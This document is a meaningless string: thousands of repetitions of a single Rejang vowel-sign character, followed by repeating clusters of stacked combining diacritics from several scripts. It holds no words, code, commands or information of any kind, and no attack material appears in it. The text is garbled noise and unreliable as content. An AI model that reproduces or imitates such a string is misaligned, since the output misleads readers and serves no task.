ꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈ᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧ